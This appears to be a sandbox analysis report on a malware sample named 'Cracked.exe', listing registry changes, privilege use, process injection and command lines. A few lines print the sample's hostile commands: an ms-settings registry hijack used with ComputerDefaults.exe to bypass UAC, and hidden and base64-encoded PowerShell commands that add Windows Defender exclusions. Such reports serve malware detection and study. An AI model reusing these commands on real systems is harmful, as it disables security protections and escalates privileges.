Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133328607208986159" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\ms-settings\shell\open C:\Windows\Client.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\ms-settings C:\Windows\Client.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\ms-settings\shell\open\command\DelegateExecute C:\Windows\Client.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\ms-settings\shell C:\Windows\Client.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe'" C:\Windows\Client.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Client.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1684 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1684 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1684 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Windows\Client.exe
PID 1684 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Windows\Client.exe
PID 4924 wrote to memory of 2992 N/A C:\Windows\Client.exe C:\Windows\explorer.exe
PID 4924 wrote to memory of 2992 N/A C:\Windows\Client.exe C:\Windows\explorer.exe
PID 4924 wrote to memory of 3940 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4924 wrote to memory of 3940 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4924 wrote to memory of 3940 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4924 wrote to memory of 3940 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4924 wrote to memory of 3940 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4924 wrote to memory of 3940 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4924 wrote to memory of 3940 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4924 wrote to memory of 3940 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1684 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
PID 1684 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
PID 1684 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
PID 4924 wrote to memory of 3852 N/A C:\Windows\Client.exe C:\Windows\System32\ComputerDefaults.exe
PID 4924 wrote to memory of 3852 N/A C:\Windows\Client.exe C:\Windows\System32\ComputerDefaults.exe
PID 3852 wrote to memory of 3232 N/A C:\Windows\System32\ComputerDefaults.exe C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
PID 3852 wrote to memory of 3232 N/A C:\Windows\System32\ComputerDefaults.exe C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Cracked.exe

"C:\Users\Admin\AppData\Local\Temp\Cracked.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZABjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AZQB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAbQBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AYgBqACMAPgA="

C:\Windows\Client.exe

"C:\Windows\Client.exe"

C:\Windows\explorer.exe

